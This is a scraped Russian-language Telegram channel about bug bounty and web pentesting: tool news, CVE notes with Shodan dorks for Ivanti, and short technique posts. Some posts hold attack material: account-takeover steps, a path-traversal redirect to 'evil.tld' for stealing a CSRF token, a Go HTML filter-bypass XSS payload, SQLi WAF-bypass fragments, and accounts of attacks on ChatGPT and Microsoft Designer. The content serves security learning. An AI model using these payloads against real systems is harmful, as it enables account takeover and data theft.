shadow_group_tg | Unsorted

Telegram-канал shadow_group_tg - SHADOW:Group

11529

Чат: @shadow_chat_tg Предложения, вопросы, сотрудничество: @shdwpwn

Subscribe to a channel

SHADOW:Group

Поздравляем @b4bk4 с похеком хрома и двумя CVE)

Читать полностью…

SHADOW:Group

🎤Responsible disclosure podcast

Топ немецкого багбаунти @Valyaroller наконец представил первый выпуск своего подкаста на русском языке. Всем багхантерам, пентестерам и тем, кто в теме рекомендую к просмотру! Поддержите лайками, подписками и полезным фидбеком!

Ссылка на YouTube

Читать полностью…

SHADOW:Group

Две недели назад вышел новый релиз Nuclei v3.2.0 от Project Discovery.

В новой версии добавили расширенную функциональность сканов с учетными данными, поддерживающую различные схемы аутентификации

nuclei -u http://example.com/ -secret-file example_auth.yaml


Authentication Types:
✅ Static Authentication - статичные креды (username и password) для Basic Auth, API Key, Bearer Token, Custom Header, Cookie
✅ Dynamic Authentication - OAuth2.0, когда статичные креды (username и password) используются для получения Session Tokens/Cookie, Custom Header

Secret file содержит учетные данные для аутентификации для ресурсов по совпадению значений domains и domains-regex, без необходимости изменять уже существующие шаблоны

static:
# 1. Basic Auth based auth
- type: basicauth
domains:
- scanme.sh
username: test
password: test
# 2. Bearer Token based auth
- type: bearertoken
domains-regex:
- .*scanme.sh
- .*example.com
token: test
dynamic:
- template: /path/to/wordpress-login.yaml
variables:
- name: username
value: test
- name: password
value: test
type: cookie
domains:
- blog.example.com
cookies:
- raw: "{{wp-global-cookie}}"
- raw: "{{wp-admin-cookie}}"
- raw: "{{wp-plugin-cookie}}"


В следующих релизах авторы планируют также добавить интеграцию с HashiCorp Vault, AWS Secrets Manager и 1Password

Читать полностью…

SHADOW:Group

📨Немного про уязвимости в функциях регистрации и приглашения пользователей

Неоднократно сталкивался с подобным кейсом в различных компаниях:

🔹Используем функцию приглашения пользователя и указываем там свою резервную почту
🔹Получаем приглашение себе на резервную почту
🔹Переходим по ссылке из приглашения, задаем пароль, перехватываем запрос и изменяем адрес электронной почты в запросе через параметр "email" на почту жертвы
🔹Получаем аккаунт, зарегистрированный на чужую почту без подтверждения от её владельца.

Но как можно повысить импакт?

🔹попробовать подставить почту существующего пользователя, что может привести к смене его пароля и, как следствие, захвату аккаунта
🔹если предыдущий трюк не сработал, то можно еще проверить на CSRF. Недавно на багбаунти попался похожий кейс, где просто подстановка почты жертвы не работала, но при CSRF с куками жертвы позволяла поменять ему адрес почты и/или пароль без подтверждения
🔹попробовать зарегистрировать корпоративные учетки, например, такие как shdw@company.com, admin@company.com и т.д. Для корпоративных учеток может быть доступен дополнительный (в том числе админский) функционал, недоступный обычным пользователям.

#web #logic #ato

Читать полностью…

SHADOW:Group

🎁 Dev(Sec)Ops RoadMap как найти работу
#карьера #devsecops

В чате канала вчера спрашивали про roadmap для DevSecOps. Что нужно учить?

Пункт 1. Я считаю правильным ответом на данный вопрос всегда являлся и будет являться ответ: зайди на сайт с вакансиями, найди выбранную должность и прочитай 20-30 вакансий, выпиши повторяющиеся термины и изучи что это. Это применимо к любой стране и к любой должности, если вы конечно не выбираете учить то, чего ещё нет на рынке. В таком случае откуда вы об этом узнали, оттуда начинайте поиск информации о необходимых навыках.

Но мы же люди ленивые? Лично я, да. Все всегда хочется искать что-то самостоятельно, а найти готовый roadmap или mindmap, где за вас умные люди составили график, что вам нужно учить. В таком случае нашёл для Вас несколько интересных материалов:

А Вы точно уверены, что перед тем как стать DevSecOps, вы изучили инструменты DevOps и научились применять эти практики?


▶️ Если нет, то возвращаемся к пункту 1, за красной таблеткой. Если же вы выбурили синюю таблетку, то вот мой ответ на вопрос: "Что нужно знать DevOps инженеру?"
Управления версиями: Gitlab
Инструменты CI/CD: Jenkins, Gitlab, (набирает популярность Agro CD)
Оркестрация контейнеров: kubernetes, docker-compose (более редко необходим Docker Sward, OpenShift)
Автоматизация развертывания: Ansible, Terraform
Языки программирования: Python, Bash
Хранение секретов: Vault
Мониторинг: Prometheus, Grafana [ Zabbix пора отправить на покой ]
Логгирование: ELK

Если слова выше для вас не показались чем-то незнакомым или как говорит мой друг, "на эльфийском языке", то поздравляю, Вы DevOps инженер :)

▶️ Возвращаясь к теме поста, что нужно учить DevSecOps? Всё то, что знает DevOps и:
Поиск секретов: GitGuardian, Gitleaks, truffleHog, DeepSecrets (последнее от моего знакомого Михаила из Avito Tech, у его инструмента не стандартный подход к поиску секретов)
SCA: Snyk, Syft, Cdxgen, Trivy, Dependency Track
SAST: Semgrep (много фолзит, использовать только вкупе с чем-то), Bearer, CodeQL, Spotbug, Terrascan
DAST: OWASP ZAP, nuclei, Dastardly
Container Security: Grype, Open Policy Agent, kube-hunter (активно не поддерживается), kube-bench , Falco, Tracee, Anchore (активно не поддерживается), Clair

⭐️ Как-то так. На самом деле список тулз у DevSecOps постоянно пополняются. И тем более приходится писать что-то под свои задачи. Надеюсь было полезно. Но DevSecOps
Также отдельное спасибо @belka_e


Отмечу, что сейчас сам занимаюсь разработкой и по сути у меня нет коммерческого опыта ни в разработке, ни в DevSecOps. Так что узнаю всё по ходу выкладывания постов. Но большое спасибо коллегам, кто готов помогать мне!

Выводы:
1. У нас очень мало DAST'ов опенсоурсных, да и коммерческих качественных рабочих решений тоже мало.
2. Простор для разработки коммерческих решений огромен, как и потенциал этой области.
3. DevOps не очень сложно обучиться, а вот DevSecOps уже даёт прикурить знатно, проверено на себе.
4. Методологии и инструменты DevSecOps мало где применяются, так что рынок ждёт новых решений и подходов.
5. Когда я слышал про заоблачные ЗП devsecops инженеров, думал что ситуация как с MLщиками и Data Science в своё время, но нет. Тут реально огромный пул знаний, который включает в себя ещё по меньшей мере appsec и даже пентест.

❤️ @poxek

Читать полностью…

SHADOW:Group

💻 Коллекция эксплойтов AI/ML

Авторы пошерстили атаки на инструменты, библиотеки и фреймворки, используемые для создания, обучения и развертывания моделей машинного обучения и собрали репозиторий содержащий эксплойты и шаблоны для их эксплуатации.

Многие из этих атак приводят к полному захвату системы и/или потере конфиденциальных данных, моделей или учетных данных, зачастую, без аутентификации.

Каждый уязвимый инструмент имеет несколько подпапок, содержащих три типа утилит: модули Metasploit, шаблоны Nuclei и шаблоны для CSRF.

Ссылка на GitHub

#web #ai #tools

Читать полностью…

SHADOW:Group

​​😈 Server Side Prototype Pollution Gadgets Scanner для BurpSuite

Позволяет автоматизировать сканирование HTTP-запросов на наличие уязвимостей, связанных с prototype pollution, и производит обнаружение и эксплуатацию известных гаджетов в библиотеках, в основном с фокусом на Node.js.

Подробное описание про данные уязвимости и работу расширения читайте в блоге автора или на GitHub по ссылке ниже.

Ссылка на GitHub

#web #pp

Читать полностью…

SHADOW:Group

https://github.com/d0ge/sessionless

Sessionless — расширение для Burp Suite, чтобы редактировать, подписывать, проверять и проводить атаки на токены, которые используют веб-фреймворки для авторизации.

Состоит из модулей: Django TimestampSigner, ItsDangerous Signer, Express cookie-session middleware, OAuth2 Proxy, Tornado’s signed cookies, Ruby Rails Signed cookies.

Каждый из них позволяет брутфорсить секреты, смотреть содержимое и генерировать данные для админской сессии.

Читать полностью…

SHADOW:Group

⌨️ Standoff 365. Самое красивое недопустимое событие в деталях

Статья от @VeeZy_VeeZy про взлом новостного портала, путешествие в страну Kubernetes, кражу денежных средств с клиентских счетов, и это далеко не всё! Подробнее читайте на Хабре.

Ссылка на статью

#web #ctf #privesc #kuber

Читать полностью…

SHADOW:Group

​​​🏆Топ-10 техник веб-хакинга в 2023 году по версии PortSwigger

Традиционная номинация от Portswigger, цель которой — выявить самые значимые исследования в области веб-безопасности, опубликованные в 2023 году.

Каждая статья в списке заслуживает внимание и, если вы еще не ознакомились, то крайне рекомендую.

Ссылка на статью

#web

Читать полностью…

SHADOW:Group

😎 Поступила инфа, что 18 апреля у VK намечается закрытая тусовка для багхантеров.

А еще узнали про условие, как туда можно попасть: любой багхантер, который сдаст четыре и более оплачиваемых отчета по программам VK на платформе Standoff 365 в срок с 12 февраля по 11 апреля, — получит приглашение на ивент.

А чтобы искать уязвимости было еще интереснее, VK увеличивает выплаты по программам: VK Play, Чемпионаты VK, VK Реклама, VK Pay и Оператор рекламных данных.

Сделай дело — туси смело: https://bugbounty.standoff365.com/vendors/vk/

Читать полностью…

SHADOW:Group

🫤 Ivanti XML External Entity (XXE)

Обнаружена XXE в продуктах Ivanti (CVE-2024-22024), позволяющая неавторизованному злоумышленнику, получить доступ к внутренним ресурсам. Подробнее читайте в блоге.

Дорк для Shodan:

http.favicon.hash:-1439222863 html:"welcome.cgi?p=logo"


Шаблон для Nuclei
PoC на GitHub

#web #cve #dork #xxe

Читать полностью…

SHADOW:Group

🔥 Positive Technologies запускает багбаунти на 60 млн рублей!

В программу Positive Dream Hunting добавлено второе недопустимое событие — внедрение закладки в код продуктов Positive Technologies.

Вознаграждение получит багхантер (или команда), который сможет разместить условно вредоносную рабочую сборку с потенциально зловредным кодом на внутреннем сервере обновлений gus.ptsecurity.com либо публичных серверах update.ptsecurity.com.

Белым хакерам, которые выполнят один или несколько шагов до потенциальной реализации недопустимого события, будет присуждаться поощрительное вознаграждение. В частности:

300–500 тыс. рублей — за преодоление сетевого периметра и закрепление на узле

3–5 млн рублей — за внедрение кода в публичный релиз продукта на этапе хранения или тестирования

Все условия программы можно найти на нашем сайте.

Кроме того, Positive Technologies увеличивает вознаграждение за реализацию первого недопустимого события — кражу денег со счетов — до 60 млн рублей. До сих пор выполнить сценарий полностью не смог ни один багхантер.

😏 Испытать свои силы можно здесь: https://bugbounty.standoff365.com/programs/ptsecurity_ns/

Читать полностью…

SHADOW:Group

🧠 Захват аккаунта ChatGPT - Wildcard Web Cache Deception

История о том как проблемы с wildcard и несоответствием в нормализации путей между CDN и веб-сервером могут привести к кэширования важных конечных точек.

Ссылка на статью

#web #cache #ato

Читать полностью…

SHADOW:Group

​​💉 SQLi-Sleeps

Небольшой скрипт для автоматизации поиска Time-Based SQL инъекций в списке url-адресов.

Ссылка на GitHub

#web #sqli

Читать полностью…

SHADOW:Group

С двух ног врываюсь в фаззинг/экплоит дев браузеров. сразу получеными двумя CVE(UXSS и Adress Bar Spofing) и футболкой по почте. На самом деле потребовалось полтора года на попытки и освоение движка V8, и умение фаззить. А оказалось достаточно все просто, с нуля написать фаззер, благо если знаешь теория пишется быстро, выставление санитайзероми и https://github.com/YulinSec/ChatGPTScanner как проверка на действительно полезные вылеты программ. Наконец нормально рабочие примение LLM в ИБ. Схема проста, фаззер фаззит, дает тебе вылеты, тот скрипт проверяет на ценность вылетов, при легком изменение кода сам пишет poc. Тебе только проверять на действительные ценные poc.
В частности следующий апдейт хрома будет из за меня, так что извините.
PS? Этот канал был создан что бы выкладывать свои пет проекты/идеи которые всплывают в голове.

Читать полностью…

SHADOW:Group

⭕️Про сlient-side path traversal

Не все знают, но если на сайте есть open redirect и client side path traversal вы можете воровать заголовок с CSRF токеном через CORS запрос.

Например, если приложение через fetch() добавляет заголовок csrfToken при обращении к /api/user, то с помощью path traversal и open redirect'а мы можем похитить заголовок, отправив жертву на /api/user/../redirect?to=evil.tld/corsAllow

Еще больше практических примеров использования path traversal на стороне клиента вы можете узнать из статей, представленных ниже:

➖Practical Example Of Client Side Path Manipulation
➖From an Innocent Client-Side Path Traversal to Account Takeover
➖Client-side path traversal vulnerability class explained - $6,580 GitLab bug bounty

➖Practical Client Side Path Traversal Attacks
Nightbloodz/the-power-of-client-side-path-traversal-how-i-found-and-escalated-2-bugs-through-670338afc90f">➖The power of Client-Side Path Traversal: How I found and escalated 2 bugs through "../"

#web #pathtraversal

Читать полностью…

SHADOW:Group

🖥 Автоматизируем поиск CRLF

Наткнулся на пост, где автор вдохновился исследованием HTTP Request Splitting от @blackfan и решил накидать скрипт для детекта некоторых представленных там уязвимостей.

Подробнее про работу скрипта рассказано тут а сам код доступен на GitHub. А на скрине сверху, уже другой исследователь запилил шаблон для Bcheck, чтобы детектить это в Burp Suite.

Для эксплуатации уязвимой конечной точки можете обратиться к данному исследованию и помните, чтобы иметь хороший рабочий PoC при отправке - демонстрируйте импакт, а не уязвимость.

#web #crlf

Читать полностью…

SHADOW:Group

⌨️Как киношные хакеры испортили жизнь ИБ-специалистам

Многие из нас видели в кино кулхацкеров способных в пару кликов взломать любую систему. Вдобавок к этому сцены взлома сопровождаются звуковыми и визуальными эффектами, которые вызывают если не смех, то ироническую улыбку у всех, кто в теме.

В статье на Хабре автор решил развеять миф о всесильности хакеров и объяснить, как этот миф мешает внедрению культуры кибербезопасности в компаниях.

Ссылка на Habr

Читать полностью…

SHADOW:Group

Bighuge BLS OSINT Tool

BEE·bot — рекурсивный интернет-сканер для хакеров, вдохновленный Spiderfoot.

Возможности:
сканирование нескольких целей одновременно
скриншоты найденных урлов
набор offensive-модулей
пермутации поддоменов на основе AI
Нативный вывод в Neo4j
Python API + документация для разработчиков

Ссылка на GitHub

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Читать полностью…

SHADOW:Group

🪟 SSRF в Microsoft Designer

Статья об эксплуатации SSRF, которую обнаружили и успешно использовали в одном из продуктов искусственного интеллекта от Microsoft.

Ссылка на статью

#web #ssrf #ai

Читать полностью…

SHADOW:Group

Cпешите видеть 🫣 и слышать на Яндекс Музыке, Apple Podcasts и ВКонтакте

Сегодня ведущий выпуска — Сергей Зыбнев, пентестер Awillix, автор канала «Похек». Гость — Антон Лопаницын более известный как bo0om, исследователь информационной безопасности и блогер.

Ламповый разговор о направлениях развития и мотивации ИБ-специалистов, об успехах, нелепых провалах, смешных уязвимостях и глубокой экспертизе в области трусошаренья.

Читать полностью…

SHADOW:Group

🧠 Как были найдены 2 Stored XSS в ChatGPT

Подробная статья про доведение XSS до импакта, борьбу с CSP, использование Mass Assignment и обход SameSite Cookies.

Ссылка на статью

#web #xss #csp

Читать полностью…

SHADOW:Group

😈 Social Engineeringсамый крупный ресурс в Telegram, посвященный Информационной Безопасности, OSINT и Cоциальной Инженерии.

Особое внимание стоит обратить на следующую информацию:

Собственный бот, который проверит Ваш файл 70 антивирусами одновременно;
Коллекция инструментов и ресурсов для поиска информации о человеке;
Актуальные методы социальной инженерии и профайлинга;
Подборка бесплатных курсов для изучения компьютерных сетей.

Вас ждёт только актуальный и качественный материал. @S.E.

Читать полностью…

SHADOW:Group

💻 Раскрытые уязвимости с багбаунти, ч.9

1️⃣ Захват аккаунта через Self-XSS
Пример того, как с помощью дополнительного функционала можно от бесполезной Self XSS выжать захват аккаунта в один клик. Подробнее смотрите в отчете.

2️⃣ SQL инъекция в POST запросе
Идентификация и эксплуатация Union-based SQL-инъекции в POST запросе на основе ответов сервера. Подробнее про эксплуатацию подобных уязвимостей тут.

3️⃣ OTP Bypass
Обходим подтверждение OTP через манипуляцию с ответом сервера. Про такие баги я вам рассказывал тут.

#web #xss #ato #cache #sqli

Читать полностью…

SHADOW:Group

Недавно нашел обход фильтрации тегов в golang.
Для строки <a/href/='https://google.com/#&gt;&lt;img src=x onerror=alert()>slon</img></h1>'>google</a>, golang net/html увидит следующий DOM:

  html
head
body
a
->href: https://google.com/#&gt;&lt;img src=x onerror=alert()>slon</img></h1>

То есть он будет думать что у нас есть только ссылка на google.com
В тоже время в браузере вы увидите, что у нас загрузился тег <img> и всплыл popup alert
Баг существует в последней версии golang и будет исправлен в next релизе.

Читать полностью…

SHADOW:Group

​​💉 Про обход защиты от SQL-инъекций

Часто WAF на сайте душит все попытки провести SQL-инъекцию и не дает нормально воткнуть кавычку и вставить привычный пэйлоад, однако, нехитрыми манипуляциями все же частенько его можно обойти.

Например, добавив управляющие символы , типа %00, %0A и др. или вставив математические операции ('AND'1'=1*1 вместо 'AND'1'='1') или добавив специфичные комментарии типа /*!50000%55nIoN*/ /*!50000%53eLeCt*/ и многое другое.

Еще больше примеров, вы можете найти в этом репозитории, где приведены варианты байпасса для различных ситуаций, а также крайне рекомендую этот сайт.

#web #sqli #bypass #waf

Читать полностью…

SHADOW:Group

🎤Подкаст Just Security by Awillix #3. Путь исследователя

На выходных послушал подкаст с Paul Axe, на счету которого несколько 0day'ев, множество RCE'шек, участия в международных конференциях и CTF'ах и тд… Рекомендую глянуть и вам про его опыт, мотивацию, подход к поиску уязвимостей, багбаунти, CTF и сертификации.

#web #ctf #0day #bb

Читать полностью…

SHADOW:Group

💀 SSRF приводящий к RCE в Ivanti Connect Secure

Раскрытый сегодня PoC для SSRF в Ivanti Pulse Connect Secure (CVE-2024-21893) является отличным примером того, как с помощью полностью слепой SSRF можно достичь RCE.

Подробнее читайте в блоге по ссылке.

Дорк для Shodan:

http.favicon.hash:-1439222863 html:"welcome.cgi?p=logo"


Ссылка на PoC
Ссылка на шаблон Nuclei

#web #cve #ssrf #rce #dork

Читать полностью…

SHADOW:Group

​​📱 Обход WAF через мобильное приложение

Иногда WAF на вебе не позволяют встраивать полезную нагрузку в запросы, однако вы можете ввести свою полезную нагрузку через приложение для Android или IOS и она может отработать на веб-сайте без какой-либо блокировки.

#web #waf

Читать полностью…
Subscribe to a channel